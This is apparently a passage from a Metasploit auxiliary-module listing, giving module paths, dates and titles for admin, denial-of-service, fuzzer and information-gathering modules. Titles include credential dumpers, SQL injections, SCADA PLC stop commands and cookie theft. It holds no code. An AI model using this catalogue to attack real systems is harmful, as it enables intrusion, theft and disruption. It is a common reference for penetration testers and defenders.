   admin/http/nuuo_nvrmini_reset                                  2016-08-04       normal  NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset
   admin/http/openbravo_xxe                                       2013-10-30       normal  Openbravo ERP XXE Arbitrary File Read
   admin/http/rails_devise_pass_reset                             2013-01-28       normal  Ruby on Rails Devise Authentication Password Reset
   admin/http/scadabr_credential_dump                             2017-05-28       normal  ScadaBR Credentials Dumper
   admin/http/scrutinizer_add_user                                2012-07-27       normal  Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass
   admin/http/sophos_wpa_traversal                                2013-04-03       normal  Sophos Web Protection Appliance patience.cgi Directory Traversal
   admin/http/sysaid_admin_acct                                   2015-06-03       normal  SysAid Help Desk Administrator Account Creation
   admin/http/sysaid_file_download                                2015-06-03       normal  SysAid Help Desk Arbitrary File Download
   admin/http/sysaid_sql_creds                                    2015-06-03       normal  SysAid Help Desk Database Credentials Disclosure
   admin/http/telpho10_credential_dump                            2016-09-02       normal  Telpho10 Backup Credentials Dumper
   admin/http/tomcat_administration                                                normal  Tomcat Administration Tool Default Access
   admin/http/tomcat_utf8_traversal                               2009-01-09       normal  Tomcat UTF-8 Directory Traversal Vulnerability
   admin/http/trendmicro_dlp_traversal                            2009-01-09       normal  TrendMicro Data Loss Prevention 5.5 Directory Traversal
   admin/http/typo3_sa_2009_001                                   2009-01-20       normal  TYPO3 sa-2009-001 Weak Encryption Key File Disclosure
   admin/http/typo3_sa_2009_002                                   2009-02-10       normal  Typo3 sa-2009-002 File Disclosure
   admin/http/typo3_sa_2010_020                                                    normal  TYPO3 sa-2010-020 Remote File Disclosure
   admin/http/typo3_winstaller_default_enc_keys                                    normal  TYPO3 Winstaller Default Encryption Keys
   admin/http/vbulletin_upgrade_admin                             2013-10-09       normal  vBulletin Administrator Account Creation
   admin/http/webnms_cred_disclosure                              2016-07-04       normal  WebNMS Framework Server Credential Disclosure
   admin/http/webnms_file_download                                2016-07-04       normal  WebNMS Framework Server Arbitrary Text File Download
   admin/http/wp_custom_contact_forms                             2014-08-07       normal  WordPress custom-contact-forms Plugin SQL Upload
   admin/http/wp_easycart_privilege_escalation                    2015-02-25       normal  WordPress WP EasyCart Plugin Privilege Escalation
   admin/http/wp_symposium_sql_injection                          2015-08-18       normal  WordPress Symposium Plugin SQL Injection
   admin/http/wp_wplms_privilege_escalation                       2015-02-09       normal  WordPress WPLMS Theme Privilege Escalation
   admin/http/zyxel_admin_password_extractor                                       normal  ZyXEL GS1510-16 Password Extractor
   admin/kerberos/ms14_068_kerberos_checksum                      2014-11-18       normal  MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
   admin/maxdb/maxdb_cons_exec                                    2008-01-09       normal  SAP MaxDB cons.exe Remote Command Injection
   admin/misc/sercomm_dump_config                                 2013-12-31       normal  SerComm Device Configuration Dump
   admin/misc/wol                                                                  normal  UDP Wake-On-Lan (WOL)
   admin/motorola/wr850g_cred                                     2004-09-24       normal  Motorola WR850G v4.03 Credentials
   admin/ms/ms08_059_his2006                                      2008-10-14       normal  Microsoft Host Integration Server 2006 Command Execution Vulnerability
   admin/mssql/mssql_enum                                                          normal  Microsoft SQL Server Configuration Enumerator
   admin/mssql/mssql_enum_domain_accounts                                          normal  Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   admin/mssql/mssql_enum_domain_accounts_sqli                                     normal  Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   admin/mssql/mssql_enum_sql_logins                                               normal  Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   admin/mssql/mssql_escalate_dbowner                                              normal  Microsoft SQL Server Escalate Db_Owner
   admin/mssql/mssql_escalate_dbowner_sqli                                         normal  Microsoft SQL Server SQLi Escalate Db_Owner
   admin/mssql/mssql_escalate_execute_as                                           normal  Microsoft SQL Server Escalate EXECUTE AS
   admin/mssql/mssql_escalate_execute_as_sqli                                      normal  Microsoft SQL Server SQLi Escalate Execute AS
   admin/mssql/mssql_exec                                                          normal  Microsoft SQL Server xp_cmdshell Command Execution
   admin/mssql/mssql_findandsampledata                                             normal  Microsoft SQL Server Find and Sample Data
   admin/mssql/mssql_idf                                                           normal  Microsoft SQL Server Interesting Data Finder
   admin/mssql/mssql_ntlm_stealer                                                  normal  Microsoft SQL Server NTLM Stealer
   admin/mssql/mssql_ntlm_stealer_sqli                                             normal  Microsoft SQL Server SQLi NTLM Stealer
   admin/mssql/mssql_sql                                                           normal  Microsoft SQL Server Generic Query
   admin/mssql/mssql_sql_file                                                      normal  Microsoft SQL Server Generic Query from File
   admin/mysql/mysql_enum                                                          normal  MySQL Enumeration Module
   admin/mysql/mysql_sql                                                           normal  MySQL SQL Generic Query
   admin/natpmp/natpmp_map                                                         normal  NAT-PMP Port Mapper
   admin/netbios/netbios_spoof                                                     normal  NetBIOS Response Brute Force Spoof (Direct)
   admin/officescan/tmlisten_traversal                                             normal  TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access
   admin/oracle/ora_ntlm_stealer                                  2009-04-07       normal  Oracle SMB Relay Code Execution
   admin/oracle/oracle_login                                      2008-11-20       normal  Oracle Account Discovery
   admin/oracle/oracle_sql                                        2007-12-07       normal  Oracle SQL Generic Query
   admin/oracle/oraenum                                                            normal  Oracle Database Enumeration
   admin/oracle/osb_execqr                                        2009-01-14       normal  Oracle Secure Backup exec_qr() Command Injection Vulnerability
   admin/oracle/osb_execqr2                                       2009-08-18       normal  Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
   admin/oracle/osb_execqr3                                       2010-07-13       normal  Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
   admin/oracle/post_exploitation/win32exec                       2007-12-07       normal  Oracle Java execCommand (Win32)
   admin/oracle/post_exploitation/win32upload                     2005-02-10       normal  Oracle URL Download
   admin/oracle/sid_brute                                         2009-01-07       normal  Oracle TNS Listener SID Brute Forcer
   admin/oracle/tnscmd                                            2009-02-01       normal  Oracle TNS Listener Command Issuer
   admin/pop2/uw_fileretrieval                                    2000-07-14       normal  UoW pop2d Remote File Retrieval Vulnerability
   admin/postgres/postgres_readfile                                                normal  PostgreSQL Server Generic Query
   admin/postgres/postgres_sql                                                     normal  PostgreSQL Server Generic Query
   admin/sap/sap_configservlet_exec_noauth                        2012-11-01       normal  SAP ConfigServlet OS Command Execution
   admin/sap/sap_mgmt_con_osexec                                                   normal  SAP Management Console OSExecute
   admin/scada/advantech_webaccess_dbvisitor_sqli                 2014-04-08       normal  Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection
   admin/scada/ge_proficy_substitute_traversal                    2013-01-22       normal  GE Proficy Cimplicity WebView substitute.bcl Directory Traversal
   admin/scada/modicon_command                                    2012-04-05       normal  Schneider Modicon Remote START/STOP Command
   admin/scada/modicon_password_recovery                          2012-01-19       normal  Schneider Modicon Quantum Password Recovery
   admin/scada/modicon_stux_transfer                              2012-04-05       normal  Schneider Modicon Ladder Logic Upload/Download
   admin/scada/moxa_credentials_recovery                          2015-07-28       normal  Moxa Device Credential Retrieval
   admin/scada/multi_cip_command                                  2012-01-19       normal  Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands
   admin/scada/phoenix_command                                    2015-05-20       normal  PhoenixContact PLC Remote START/STOP Command
   admin/scada/yokogawa_bkbcopyd_client                           2014-08-09       normal  Yokogawa BKBCopyD.exe Client
   admin/serverprotect/file                                                        normal  TrendMicro ServerProtect File Access
   admin/smb/check_dir_file                                                        normal  SMB Scanner Check File/Directory Utility
   admin/smb/delete_file                                                           normal  SMB File Delete Utility
   admin/smb/download_file                                                         normal  SMB File Download Utility
   admin/smb/list_directory                                                        normal  SMB Directory Listing Utility
   admin/smb/psexec_command                                                        normal  Microsoft Windows Authenticated Administration Utility
   admin/smb/psexec_ntdsgrab                                                       normal  PsExec NTDS.dit And SYSTEM Hive Download Utility
   admin/smb/samba_symlink_traversal                                               normal  Samba Symlink Directory Traversal
   admin/smb/upload_file                                                           normal  SMB File Upload Utility
   admin/sunrpc/solaris_kcms_readfile                             2003-01-22       normal  Solaris KCMS + TTDB Arbitrary File Read
   admin/tftp/tftp_transfer_util                                                   normal  TFTP File Transfer Utility
   admin/tikiwiki/tikidblib                                       2006-11-01       normal  TikiWiki Information Disclosure
   admin/upnp/soap_portmapping                                                     normal  UPnP IGD SOAP Port Mapping Utility
   admin/vmware/poweroff_vm                                                        normal  VMWare Power Off Virtual Machine
   admin/vmware/poweron_vm                                                         normal  VMWare Power On Virtual Machine
   admin/vmware/tag_vm                                                             normal  VMWare Tag Virtual Machine
   admin/vmware/terminate_esx_sessions                                             normal  VMWare Terminate ESX Login Sessions
   admin/vnc/realvnc_41_bypass                                    2006-05-15       normal  RealVNC NULL Authentication Mode Bypass
   admin/vxworks/apple_airport_extreme_password                                    normal  Apple Airport Extreme Password Extraction (WDBRPC)
   admin/vxworks/dlink_i2eye_autoanswer                                            normal  D-Link i2eye Video Conference AutoAnswer (WDBRPC)
   admin/vxworks/wdbrpc_memory_dump                                                normal  VxWorks WDB Agent Remote Memory Dump
   admin/vxworks/wdbrpc_reboot                                                     normal  VxWorks WDB Agent Remote Reboot
   admin/webmin/edit_html_fileaccess                              2012-09-06       normal  Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   admin/webmin/file_disclosure                                   2006-06-30       normal  Webmin File Disclosure
   admin/zend/java_bridge                                         2011-03-28       normal  Zend Server Java Bridge Design Flaw Remote Code Execution
   analyze/jtr_aix                                                                 normal  John the Ripper AIX Password Cracker
   analyze/jtr_crack_fast                                                          normal  John the Ripper Password Cracker (Fast Mode)
   analyze/jtr_linux                                                               normal  John the Ripper Linux Password Cracker
   analyze/jtr_mssql_fast                                                          normal  John the Ripper MS SQL Password Cracker (Fast Mode)
   analyze/jtr_mysql_fast                                                          normal  John the Ripper MySQL Password Cracker (Fast Mode)
   analyze/jtr_oracle_fast                                                         normal  John the Ripper Oracle Password Cracker (Fast Mode)
   analyze/jtr_postgres_fast                                                       normal  John the Ripper Postgres SQL Password Cracker
   bnat/bnat_router                                                                normal  BNAT Router
   bnat/bnat_scan                                                                  normal  BNAT Scanner
   client/hwbridge/connect                                                         normal  Hardware Bridge Session Connector
   client/mms/send_mms                                                             normal  MMS Client
   client/sms/send_text                                                            normal  SMS Client
   client/smtp/emailer                                                             normal  Generic Emailer (SMTP)
   crawler/msfcrawler                                                              normal  Metasploit Web Crawler
   docx/word_unc_injector                                                          normal  Microsoft Word UNC Path Injector
   dos/android/android_stock_browser_iframe                       2012-12-01       normal  Android Stock Browser Iframe DOS
   dos/cisco/ios_http_percentpercent                              2000-04-26       normal  Cisco IOS HTTP GET /%% Request Denial of Service
   dos/cisco/ios_telnet_rocem                                     2017-03-17       normal  Cisco IOS Telnet Denial of Service
   dos/dhcp/isc_dhcpd_clientid                                                     normal  ISC DHCP Zero Length ClientID Denial of Service Module
   dos/dns/bind_tkey                                              2015-07-28       normal  BIND TKEY Query Denial of Service
   dos/dns/bind_tsig                                              2016-09-27       normal  BIND TKEY Query Denial of Service
   dos/freebsd/nfsd/nfsd_mount                                                     normal  FreeBSD Remote NFS RPC Request Denial of Service
   dos/hp/data_protector_rds                                      2011-01-08       normal  HP Data Protector Manager RDS DOS
   dos/http/3com_superstack_switch                                2004-06-24       normal  3Com SuperStack Switch Denial of Service
   dos/http/apache_commons_fileupload_dos                         2014-02-06       normal  Apache Commons FileUpload and Apache Tomcat DoS
   dos/http/apache_mod_isapi                                      2010-03-05       normal  Apache mod_isapi Dangling Pointer
   dos/http/apache_range_dos                                      2011-08-19       normal  Apache Range Header DoS (Apache Killer)
   dos/http/apache_tomcat_transfer_encoding                       2010-07-09       normal  Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   dos/http/canon_wireless_printer                                2013-06-18       normal  Canon Wireless Printer Denial Of Service
   dos/http/dell_openmanage_post                                  2004-02-26       normal  Dell OpenManage POST Request Heap Overflow (win32)
   dos/http/f5_bigip_apm_max_sessions                                              normal  F5 BigIP Access Policy Manager Session Exhaustion Denial of Service
   dos/http/gzip_bomb_dos                                         2004-01-01       normal  Gzip Memory Bomb Denial Of Service
   dos/http/hashcollision_dos                                     2011-12-28       normal  Hashtable Collisions
   dos/http/ibm_lotus_notes                                       2017-08-31       normal  IBM Notes encodeURI DOS
   dos/http/ibm_lotus_notes2                                      2017-08-31       normal  IBM Notes Denial Of Service
   dos/http/monkey_headers                                        2013-05-30       normal  Monkey HTTPD Header Parsing Denial of Service (DoS)
   dos/http/ms15_034_ulonglongadd                                                  normal  MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   dos/http/nodejs_pipelining                                     2013-10-18       normal  Node.js HTTP Pipelining Denial of Service
   dos/http/novell_file_reporter_heap_bof                         2012-11-16       normal  NFR Agent Heap Overflow Vulnerability
   dos/http/rails_action_view                                     2013-12-04       normal  Ruby on Rails Action View MIME Memory Exhaustion
   dos/http/rails_json_float_dos                                  2013-11-22       normal  Ruby on Rails JSON Processor Floating Point Heap Overflow DoS
   dos/http/sonicwall_ssl_format                                  2009-05-29       normal  SonicWALL SSL-VPN Format String Vulnerability
   dos/http/webrick_regex                                         2008-08-08       normal  Ruby WEBrick::HTTP::DefaultFileHandler DoS
   dos/http/wordpress_directory_traversal_dos                                      normal  WordPress Traversal Directory DoS
   dos/http/wordpress_long_password_dos                           2014-11-20       normal  WordPress Long Password DoS
   dos/http/wordpress_xmlrpc_dos                                  2014-08-06       normal  Wordpress XMLRPC DoS
   dos/mdns/avahi_portzero                                        2008-11-14       normal  Avahi Source Port 0 DoS
   dos/misc/dopewars                                              2009-10-05       normal  Dopewars Denial of Service
   dos/misc/ibm_sametime_webplayer_dos                            2013-11-07       normal  IBM Lotus Sametime WebPlayer DoS
   dos/misc/ibm_tsm_dos                                           2015-12-15       normal  IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service
   dos/misc/memcached                                                              normal  Memcached Remote Denial of Service
   dos/ntp/ntpd_reserved_dos                                      2009-10-04       normal  NTP.org ntpd Reserved Mode Denial of Service
   dos/pptp/ms02_063_pptp_dos                                     2002-09-26       normal  MS02-063 PPTP Malformed Control Data Kernel Denial of Service
   dos/rpc/rpcbomb                                                                 normal  RPC DoS targeting *nix rpcbind/libtirpc
   dos/samba/lsa_addprivs_heap                                                     normal  Samba lsa_io_privilege_set Heap Overflow
   dos/samba/lsa_transnames_heap                                                   normal  Samba lsa_io_trans_names Heap Overflow
   dos/samba/read_nttrans_ea_list                                                  normal  Samba read_nttrans_ea_list Integer Overflow
   dos/sap/sap_soap_rfc_eps_delete_file                                            normal  SAP SOAP EPS_DELETE_FILE File Deletion
   dos/scada/beckhoff_twincat                                     2011-09-13       normal  Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS
   dos/scada/d20_tftp_overflow                                    2012-01-19       normal  General Electric D20ME TFTP Server Buffer Overflow DoS
   dos/scada/igss9_dataserver                                     2011-12-20       normal  7-Technologies IGSS 9 IGSSdataServer.exe DoS
   dos/scada/yokogawa_logsvr                                      2014-03-10       normal  Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow
   dos/smb/smb_loris                                              2017-07-29       normal  SMBLoris NBSS Denial of Service
   dos/smtp/sendmail_prescan                                      2003-09-17       normal  Sendmail SMTP Address prescan Memory Corruption
   dos/solaris/lpd/cascade_delete                                                  normal  Solaris LPD Arbitrary File Delete
   dos/ssl/dtls_changecipherspec                                  2000-04-26       normal  OpenSSL DTLS ChangeCipherSpec Remote DoS
   dos/ssl/dtls_fragment_overflow                                 2014-06-05       normal  OpenSSL DTLS Fragment Buffer Overflow DoS
   dos/ssl/openssl_aesni                                          2013-02-05       normal  OpenSSL TLS 1.1 and 1.2 AES-NI DoS
   dos/syslog/rsyslog_long_tag                                    2011-09-01       normal  rsyslog Long Tag Off-By-Two DoS
   dos/tcp/junos_tcp_opt                                                           normal  Juniper JunOS Malformed TCP Option
   dos/tcp/synflood                                                                normal  TCP SYN Flooder
   dos/upnp/miniupnpd_dos                                         2013-03-27       normal  MiniUPnPd 1.4 Denial of Service (DoS) Exploit
   dos/windows/appian/appian_bpm                                  2007-12-17       normal  Appian Enterprise Business Suite 5.6 SP1 DoS
   dos/windows/browser/ms09_065_eot_integer                       2009-11-10       normal  Microsoft Windows EOT Font Table Directory Integer Overflow
   dos/windows/ftp/filezilla_admin_user                           2005-11-07       normal  FileZilla FTP Server Admin Interface Denial of Service
   dos/windows/ftp/filezilla_server_port                          2006-12-11       normal  FileZilla FTP Server Malformed PORT Denial of Service
   dos/windows/ftp/guildftp_cwdlist                               2008-10-12       normal  Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
   dos/windows/ftp/iis75_ftpd_iac_bof                             2010-12-21       normal  Microsoft IIS FTP Server Encoded Response Overflow Trigger
   dos/windows/ftp/iis_list_exhaustion                            2009-09-03       normal  Microsoft IIS FTP Server LIST Stack Exhaustion
   dos/windows/ftp/solarftp_user                                  2011-02-22       normal  Solar FTP Server Malformed USER Denial of Service
   dos/windows/ftp/titan626_site                                  2008-10-14       normal  Titan FTP Server 6.26.630 SITE WHO DoS
   dos/windows/ftp/vicftps50_list                                 2008-10-24       normal  Victory FTP Server 5.0 LIST DoS
   dos/windows/ftp/winftp230_nlst                                 2008-09-26       normal  WinFTP 2.3.0 NLST Denial of Service
   dos/windows/ftp/xmeasy560_nlst                                 2008-10-13       normal  XM Easy Personal FTP Server 5.6.0 NLST DoS
   dos/windows/ftp/xmeasy570_nlst                                 2009-03-27       normal  XM Easy Personal FTP Server 5.7.0 NLST DoS
   dos/windows/games/kaillera                                     2011-07-02       normal  Kaillera 0.86 Server Denial of Service
   dos/windows/http/ms10_065_ii6_asp_dos                          2010-09-14       normal  Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
   dos/windows/http/pi3web_isapi                                  2008-11-13       normal  Pi3Web ISAPI DoS
   dos/windows/llmnr/ms11_030_dnsapi                              2011-04-12       normal  Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
   dos/windows/nat/nat_helper                                     2006-10-26       normal  Microsoft Windows NAT Helper Denial of Service
   dos/windows/rdp/ms12_020_maxchannelids                         2012-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   dos/windows/smb/ms05_047_pnp                                                    normal  Microsoft Plug and Play Service Registry Overflow
   dos/windows/smb/ms06_035_mailslot                              2006-07-11       normal  Microsoft SRV.SYS Mailslot Write Corruption
   dos/windows/smb/ms06_063_trans                                                  normal  Microsoft SRV.SYS Pipe Transaction No Null
   dos/windows/smb/ms09_001_write                                                  normal  Microsoft SRV.SYS WriteAndX Invalid DataOffset
   dos/windows/smb/ms09_050_smb2_negotiate_pidhigh                                 normal  Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   dos/windows/smb/ms09_050_smb2_session_logoff                                    normal  Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
   dos/windows/smb/ms10_006_negotiate_response_loop                                normal  Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
   dos/windows/smb/ms10_054_queryfs_pool_overflow                                  normal  Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
   dos/windows/smb/ms11_019_electbowser                                            normal  Microsoft Windows Browser Pool DoS
   dos/windows/smb/rras_vls_null_deref                            2006-06-14       normal  Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
   dos/windows/smb/vista_negotiate_stop                                            normal  Microsoft Vista SP0 SMB Negotiate Protocol DoS
   dos/windows/smtp/ms06_019_exchange                             2004-11-12       normal  MS06-019 Exchange MODPROP Heap Overflow
   dos/windows/ssh/sysax_sshd_kexchange                           2013-03-17       normal  Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
   dos/windows/tftp/pt360_write                                   2008-10-29       normal  PacketTrap TFTP Server 2.2.5459.0 DoS
   dos/windows/tftp/solarwinds                                    2010-05-21       normal  SolarWinds TFTP Server 10.4.0.10 Denial of Service
   dos/wireshark/capwap                                           2014-04-28       normal  Wireshark CAPWAP Dissector DoS
   dos/wireshark/chunked                                          2007-02-22       normal  Wireshark chunked_encoding_dissector Function DOS
   dos/wireshark/cldap                                            2011-03-01       normal  Wireshark CLDAP Dissector DOS
   dos/wireshark/ldap                                             2008-03-28       normal  Wireshark LDAP Dissector DOS
   fuzzers/dns/dns_fuzzer                                                          normal  DNS and DNSSEC Fuzzer
   fuzzers/ftp/client_ftp                                                          normal  Simple FTP Client Fuzzer
   fuzzers/ftp/ftp_pre_post                                                        normal  Simple FTP Fuzzer
   fuzzers/http/http_form_field                                                    normal  HTTP Form Field Fuzzer
   fuzzers/http/http_get_uri_long                                                  normal  HTTP GET Request URI Fuzzer (Incrementing Lengths)
   fuzzers/http/http_get_uri_strings                                               normal  HTTP GET Request URI Fuzzer (Fuzzer Strings)
   fuzzers/ntp/ntp_protocol_fuzzer                                                 normal  NTP Protocol Fuzzer
   fuzzers/smb/smb2_negotiate_corrupt                                              normal  SMB Negotiate SMB2 Dialect Corruption
   fuzzers/smb/smb_create_pipe                                                     normal  SMB Create Pipe Request Fuzzer
   fuzzers/smb/smb_create_pipe_corrupt                                             normal  SMB Create Pipe Request Corruption
   fuzzers/smb/smb_negotiate_corrupt                                               normal  SMB Negotiate Dialect Corruption
   fuzzers/smb/smb_ntlm1_login_corrupt                                             normal  SMB NTLMv1 Login Request Corruption
   fuzzers/smb/smb_tree_connect                                                    normal  SMB Tree Connect Request Fuzzer
   fuzzers/smb/smb_tree_connect_corrupt                                            normal  SMB Tree Connect Request Corruption
   fuzzers/smtp/smtp_fuzzer                                                        normal  SMTP Simple Fuzzer
   fuzzers/ssh/ssh_kexinit_corrupt                                                 normal  SSH Key Exchange Init Corruption
   fuzzers/ssh/ssh_version_15                                                      normal  SSH 1.5 Version Fuzzer
   fuzzers/ssh/ssh_version_2                                                       normal  SSH 2.0 Version Fuzzer
   fuzzers/ssh/ssh_version_corrupt                                                 normal  SSH Version Corruption
   fuzzers/tds/tds_login_corrupt                                                   normal  TDS Protocol Login Request Corruption Fuzzer
   fuzzers/tds/tds_login_username                                                  normal  TDS Protocol Login Request Username Fuzzer
   gather/advantech_webaccess_creds                               2017-01-21       normal  Advantech WebAccess 8.1 Post Authentication Credential Collector
   gather/alienvault_iso27001_sqli                                2014-03-30       normal  AlienVault Authenticated SQL Injection Arbitrary File Read
   gather/alienvault_newpolicyform_sqli                           2014-05-09       normal  AlienVault Authenticated SQL Injection Arbitrary File Read
   gather/android_browser_file_theft                                               normal  Android Browser File Theft
   gather/android_browser_new_tab_cookie_theft                                     normal  Android Browser "Open in New Tab" Cookie Theft
   gather/android_htmlfileprovider                                                 normal  Android Content Provider File Disclosure
   gather/android_object_tag_webview_uxss                         2014-10-04       normal  Android Open Source Platform (AOSP) Browser UXSS
   gather/android_stock_browser_uxss                                               normal  Android Open Source Platform (AOSP) Browser UXSS
   gather/apache_rave_creds                                                        normal  Apache Rave User Information Disclosure
   gather/apple_safari_ftp_url_cookie_theft                       2015-04-08       normal  Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft
   gather/apple_safari_webarchive_uxss                            2013-02-22       normal  Mac OS X Safari .webarchive File Format UXSS
   gather/asterisk_creds                                                           normal  Asterisk Gather Credentials
   gather/avtech744_dvr_accounts                                                   normal  AVTECH 744 DVR Account Information Retrieval
   gather/browser_info                                            2016-03-22       normal  HTTP Client Information Gather
   gather/censys_search                                                            normal  Censys Search
   gather/cerberus_helpdesk_hash_disclosure                       2016-03-07       normal  Cerberus Helpdesk User Hash Disclosure
   gather/checkpoint_hostname                                     2011-12-14       normal  CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure
   gather/citrix_published_applications                                            normal  Citrix MetaFrame ICA Published Applications Scanner
   gather/citrix_published_bruteforce                                              normal  Citrix MetaFrame ICA Published Applications Bruteforcer
   gather/coldfusion_pwd_props                                    2013-05-07       normal  ColdFusion 'password.properties' Hash Extraction
   gather/corpwatch_lookup_id                                                      normal  CorpWatch Company ID Information Search
   gather/corpwatch_lookup_name                                                    normal  CorpWatch Company Name Information Search
   gather/d20pass                                                 2012-01-19       normal  General Electric D20 Password Recovery
   gather/darkcomet_filedownloader                                2012-10-08       normal  DarkComet Server Remote File Download Exploit
   gather/doliwamp_traversal_creds                                2014-01-12       normal  DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials
   gather/drupal_openid_xxe                                       2012-10-17       normal  Drupal OpenID External Entity Injection
   gather/eaton_nsm_creds                                         2012-06-26       normal  Network Shutdown Module sort_values Credential Dumper
   gather/emc_cta_xxe                                             2014-03-31       normal  EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read
   gather/enum_dns                                                                 normal  DNS Record Scanner and Enumerator
   gather/eventlog_cred_disclosure                                2014-11-05       normal  ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure
   gather/external_ip                                                              normal  Discover External IP via Ifconfig.me
   gather/f5_bigip_cookie_disclosure                                               normal  F5 BigIP Backend Cookie Disclosure
   gather/firefox_pdfjs_file_theft                                                 normal  Firefox PDF.js Browser File Theft
   gather/flash_rosetta_jsonp_url_disclosure                      2014-07-08       normal  Flash "Rosetta" JSONP GET/POST Response Disclosure
   gather/hp_enum_perfd                                                            normal  HP Operations Manager Perfd Environment Scanner
   gather/hp_snac_domain_creds                                    2013-09-09       normal  HP ProCurve SNAC Domain Controller Credential Dumper
   gather/http_pdf_authors                                                         normal  Gather PDF Authors
   gather/huawei_wifi_info                                        2013-11-11       normal  Huawei Datacard Information Disclosure Vulnerability
   gather/ibm_sametime_enumerate_users                            2013-12-27       normal  IBM Lotus Notes Sametime User Enumeration
   gather/ibm_sametime_room_brute                                 2013-12-27       normal  IBM Lotus Notes Sametime Room Name Bruteforce
   gather/ibm_sametime_version                                    2013-12-27       normal  IBM Lotus Sametime Version Enumeration
   gather/ie_sandbox_findfiles                                    2016-08-09       normal  Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability
   gather/ie_uxss_injection                                       2015-02-01       normal  MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection
   gather/impersonate_ssl                                                          normal  HTTP SSL Certificate Impersonation
   gather/java_rmi_registry                                                        normal  Java RMI Registry Interfaces Enumeration
   gather/jenkins_cred_recovery                                                    normal  Jenkins Domain Credential Recovery
   gather/joomla_com_realestatemanager_sqli                       2015-10-22       normal  Joomla Real Estate Manager Component Error-Based SQL Injection
   gather/joomla_contenthistory_sqli                              2015-10-22       normal  Joomla com_contenthistory Error-Based SQL Injection
   gather/joomla_weblinks_sqli                                    2014-03-02       normal  Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
   gather/kerberos_enumusers                                                       normal  Kerberos Domain User Enumeration
   gather/konica_minolta_pwd_extract                                               normal  Konica Minolta Password Extractor
   gather/lansweeper_collector                                                     normal  Lansweeper Credential Collector
   gather/mantisbt_admin_sqli                                     2014-02-28       normal  MantisBT Admin SQL Injection Arbitrary File Read
   gather/mcafee_epo_xxe                                          2015-01-06       normal  McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure
   gather/memcached_extractor                                                      normal  Memcached Extractor
   gather/mongodb_js_inject_collection_enum                       2014-06-07       normal  MongoDB NoSQL Collection Enumeration Via Injection
   gather/ms14_052_xmldom                                         2014-09-09       normal  MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure
   gather/mybb_db_fingerprint                                     2014-02-13       normal  MyBB Database Fingerprint
   gather/natpmp_external_address                                                  normal  NAT-PMP External Address Scanner
   gather/netgear_password_disclosure                                              normal  NETGEAR Administrator Password Disclosure
   gather/opennms_xxe                                             2015-01-08       normal  OpenNMS Authenticated XXE
   gather/qnap_backtrace_admin_hash                               2017-01-31       normal  QNAP NAS/NVR Administrator Hash Disclosure
   gather/safari_file_url_navigation                              2014-01-16       normal  Mac OS X Safari file:// Redirection Sandbox Escape
   gather/search_email_collector                                                   normal  Search Engine Domain Email Address Collector
   gather/searchengine_subdomains_collector                                        normal  Search Engine Subdomains Collector
   gather/shodan_honeyscore                                                        normal  Shodan Honeyscore Client
   gather/shodan_search                                                            normal  Shodan Search
   gather/snare_registry                                                           normal  Snare Lite for Windows Registry Access
   gather/solarwinds_orion_sqli                                   2015-02-24       normal  Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation
   gather/ssllabs_scan                                                             normal  SSL Labs API Client
   gather/teamtalk_creds                                                           normal  TeamTalk Gather Credentials
   gather/trackit_sql_domain_creds                                2014-10-07       normal  BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure
   gather/vbulletin_vote_sqli                                     2013-03-24       normal  vBulletin Password Collector via nodeid SQL Injection
   gather/windows_deployment_services_shares                                       normal  Microsoft Windows Deployment Services Unattend Gatherer
   gather/wp_all_in_one_migration_export                          2015-03-19       normal  WordPress All-in-One Migration Export
   gather/wp_ultimate_csv_importer_user_extract                   2015-02-02       normal  WordPress Ultimate CSV Importer User Table Extract
   gather/wp_w3_total_cache_hash_extract                                           normal  WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract
   gather/xbmc_traversal                                          2012-11-04       normal  XBMC Web Server Directory Traversal
   gather/xerox_pwd_extract                                                        normal  Xerox Administrator Console Password Extractor
   gather/xerox_workcentre_5xxx_ldap                                               normal  Xerox Workcentre 5735 LDAP Service Redential Extractor
   gather/zabbix_toggleids_sqli                                   2016-08-11       normal  Zabbix toggle_ids SQL Injection
   gather/zoomeye_search                                                           normal  ZoomEye Search
   parser/unattend                                                                 normal  Auxilliary Parser Windows Unattend Passwords
   pdf/foxit/authbypass                                           2009-03-09       normal  Foxit Reader Authorization Bypass
